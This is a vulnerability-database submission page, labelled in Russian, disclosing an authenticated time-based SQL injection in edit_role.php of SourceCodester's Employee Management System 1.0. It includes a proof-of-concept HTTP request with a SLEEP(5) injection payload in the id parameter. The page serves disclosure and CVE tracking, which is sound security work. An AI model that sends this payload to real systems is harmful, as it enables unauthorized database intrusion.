| Название | SourceCodester Best employee management system 1.0 SQL Injection |
|---|
| Описание | Vulnerability Type: Time-Based SQL Injection
Product Name: Employee Management System
Software Link: https://www.sourcecodester.com/php/17689/best-employee-management-system-php.html
Advisory Link: https://github.com/sh3rl0ckpggp/0day/blob/main/authenticated_sqli_Employee_management_system.md
Affected Script: edit_role.php
Author: sh3rl0ckpgp
Vendor Homepage: https://www.sourcecodester.com
Vulnerability Status: Verified
Proof of Concept (PoC)
Vulnerable Request:
======
POST /hr_soft/admin/edit_role.php HTTP/1.1
Host: localhost
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
id=1';SELECT SLEEP(5) AND 'test'='test
PoC Payload: 1';SELECT SLEEP(5) AND 'test'='test
Explanation: This payload introduces a 5-second delay if the injection is successful, confirming the vulnerability.
This vulnerability has been verified and documented. Please assign a CVE to facilitate tracking and awareness.
|
|---|
| Источник | ⚠️ https://github.com/sh3rl0ckpggp/0day/blob/main/authenticated_sqli_Employee_management_system.md |
|---|
| Пользователь | sh3rl0ckpgp (UID 77534) |
|---|
| Представление | 13.11.2024 13:05 (2 лет назад) |
|---|
| Модерация | 14.11.2024 09:09 (20 hours later) |
|---|
| Статус | принято |
|---|
| Запись VulDB | 284529 [SourceCodester Best Employee Management System 1.0 /admin/edit_role.php ИД SQL-инъекция] |
|---|
| Баллы | 20 |
|---|